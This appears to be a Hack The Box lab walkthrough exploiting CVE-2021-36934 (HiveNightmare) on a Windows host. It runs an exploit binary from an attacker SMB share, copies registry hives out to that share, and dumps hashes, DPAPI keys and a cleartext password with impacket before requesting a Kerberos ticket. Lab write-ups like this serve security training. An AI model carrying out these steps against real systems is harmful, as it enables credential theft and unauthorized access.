CVE-2021-36934
Manually checking for CVE-2021-36934 after performing basic enumeration because PEAS didn’t seem to check for it
ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SAM
cmd /c icacls c:\Windows\System32\Config\SAM
c:\Windows\System32\Config\SAM BUILTIN\Administrators:(I)(F)
nt authority\system:(I)(F)
builtin\users:(I)(RX)
application package authority\all application packages:(I)(RX)
application package authority\all restricted application packages:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SYSTEM
cmd /c icacls c:\Windows\System32\Config\SYSTEM
c:\Windows\System32\Config\SYSTEM BUILTIN\Administrators:(I)(F)
nt authority\system:(I)(F)
builtin\users:(I)(RX)
application package authority\all application packages:(I)(RX)
application package authority\all restricted application packages:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SECURITY
cmd /c icacls c:\Windows\System32\Config\SECURITY
c:\Windows\System32\Config\SECURITY BUILTIN\Administrators:(I)(F)
nt authority\system:(I)(F)
builtin\users:(I)(RX)
application package authority\all application packages:(I)(RX)
application package authority\all restricted application packages:(I)(RX)
Successfully processed 1 files; Failed processing 0 filesThe target system is confirmed to be vulnerable to CVE-2021-36934
a vulnerability was found in microsoft windows 10/11 (Operating System) and classified as critical. Affected by this issue is some unknown processing of the file C:\Windows\System32\config\SAM of the component Volume Shadow Copy. The manipulation with an unknown input leads to a permission vulnerability (SeriousSAM/HiveNightmare). Using CWE to declare the problem leads to CWE-275. Impacted is confidentiality.
CVE-2021-36934, also known as “HiveNightmare” or “SeriousSAM”, is a security vulnerability affecting Windows systems. The flaw allows non-privileged users to access and read sensitive registry hives, including the SAM and SYSTEM hives, which store critical system configuration and security information, including hashed passwords. Exploiting this vulnerability may lead to unauthorized access to sensitive data, posing a risk of credential exposure. Microsoft addressed this issue by releasing security updates, and users are advised to apply the necessary patches to mitigate the risk of exploitation.
Exploit
Exploit available online
The repo provides a pre-compiled binaries
Exploitation
ps c:\Users\btables\Documents> \\10.10.14.23\smb\HiveNightmare\Release\HiveNightmare.exe
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM
success: SAM hive from 2023-12-13 written out to current working directory as SAM-2023-12-13
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SECURITY
success: SECURITY hive from 2023-12-14 written out to current working directory as SECURITY-2023-12-14
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM
success: SYSTEM hive from 2023-12-14 written out to current working directory as SYSTEM-2023-12-14
Assuming no errors above, you should be able to find hive dump files in current working directory.Executing the binary
ps c:\Users\btables\Documents> ls
directory: C:\Users\btables\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/5/2024 2:22 PM 3119779 adPEAS.ps1
-a---- 1/5/2024 2:53 PM 8397 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin
-a---- 1/5/2024 2:53 PM 11797 outdated.htb_20240105145344_BloodHound.zip
-a---- 1/5/2024 3:49 PM 65536 SAM-2023-12-13
-a---- 1/5/2024 3:49 PM 32768 SECURITY-2023-12-14
-a---- 1/5/2024 3:49 PM 11534336 SYSTEM-2023-12-14
-a---- 1/5/2024 2:23 PM 1968640 winPEASx64.exe The registry hives are saved
ps c:\Users\btables\Documents> copy *-2023-* \\10.10.14.23\smb\HiveNightmare\Downloading the registry hives to Kali
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/outdated/HiveNightmare]
└─$ impacket-secretsdump local -sam SAM-2023-12-13 -system SYSTEM-2023-12-14 -security SECURITY-2023-12-14
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x0e2bd3cb19e8aa5c74f4b9161423a373
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cadef52f10f56e21d9f4934c4d5bf813:::
[*] Dumping cached domain logon information (domain/username:hash)
OUTDATED.HTB/btables:$DCC2$10240#btables#91e9188a93c8b59479cbe490e22fc790: (2024-01-05 19:49:45)
OUTDATED.HTB/Administrator:$DCC2$10240#Administrator#fcf452603a2e8ee8f65158c73469cf7e: (2023-12-13 04:07:43)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e07fd3b58402edcb90c624e44d97e0eec240dc23108958742cd8d9550fc461254b6988bf6d7bfa396f610b530569af60c01c7bf4200debcc0bc1a44daab8ccd1ceff5a12e08a967f78f3bed6a0386df6df696d7d4493377b02c8c91bd3efd21adf30d302e9024a34958b5cef97f92f7cb9ad86b42e7e0909c1f663296cdafb5c080920e6470f3c1c8bce667255f491795a3fbeee06600153728ca1ef7802a226373487aad8745a0ebaa3d51c21ec672c205a23fc3f5f77d9ce58e758254206f0c006bde3a64890248b4522d561425d82e4d26950c06877fc25103221cb61ff3e10b4b13c899f6a58d0b047b30e0956d6
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d805ad109346699956d56bf7ff7aad7a
[*] DefaultPassword
(Unknown User):5myBPLPDKT3Bfq
[*] DPAPI_SYSTEM
dpapi_machinekey:0x76a645f1d5e5879a07eb92ccc767cbe8bf5d8219
dpapi_userkey:0x8225e352fcf823af35757bacff4cdfe98c73db8f
[*] NL$KM
0000 08 4C 51 0B 9B 09 ED C8 4D 12 A0 47 40 5B 64 2D .LQ.....M..G@[d-
0010 32 3C AC B5 E2 42 0E 41 76 99 DE D7 20 E6 15 B9 2<...B.Av... ...
0020 79 57 B8 29 D2 5D 44 91 3F D5 84 76 BE 00 D2 00 yW.).]D.?..v....
0030 16 8B 85 3D 3F 17 27 1F 16 4F C0 37 64 6E 44 E5 ...=?.'..O.7dnD.
NL$KM:084c510b9b09edc84d12a047405b642d323cacb5e2420e417699ded720e615b97957b829d25d44913fd58476be00d200168b853d3f17271f164fc037646e44e5
[*] Cleaning up... Dumping credentials from the registry hives
While this credentials are system-only and there isn’t any non-default system users in the client.outdated.htb host, there is a CLEARTEXT password as “DefaultPassword”; 5myBPLPDKT3Bfq
This password likely belongs to the btables user as the user has AutoLogon configured
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ impacket-getTGT OUTDATED.HTB/btables@dc.outdated.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: 5myBPLPDKT3Bfq
[*] Saving ticket in btables@dc.outdated.htb.ccacheCredential validated against the target KDC
TGT saved for the btables user